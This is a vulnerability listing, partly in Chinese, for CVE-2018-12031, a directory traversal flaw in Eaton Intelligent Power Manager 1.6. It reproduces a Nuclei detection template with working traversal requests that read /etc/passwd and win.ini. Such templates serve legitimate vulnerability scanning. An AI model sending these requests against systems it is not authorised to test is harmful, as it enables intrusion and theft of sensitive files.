CVE-2018-12031: Eaton Intelligent Power Manager 1.6 - Directory Traversal

日期: 2025-08-01 | 影响软件: Eaton Intelligent Power Manager | POC: 已公开

漏洞描述

Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.

PoC代码[已公开]

id: CVE-2018-12031

info:
  name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
  author: daffainfo
  severity: critical
  description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.
  reference:
    - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
    - https://www.exploit-db.com/exploits/48614
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
    - https://github.com/0xT11/CVE-POC
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-12031
    cwe-id: CWE-22
    epss-score: 0.80134
    epss-percentile: 0.9908
    cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eaton
    product: intelligent_power_manager
  tags: cve,cve2018,edb,lfi,eaton

http:
  - method: GET
    path:
      - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e7b38e627caf1a9597b1150878d7ddb486929df9732ba24fa7fe6c8e233b1c44022100855cc6746445c7b36963d478fd7e6e017367a79193b7a897567a6de2c268ab30:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12031.yaml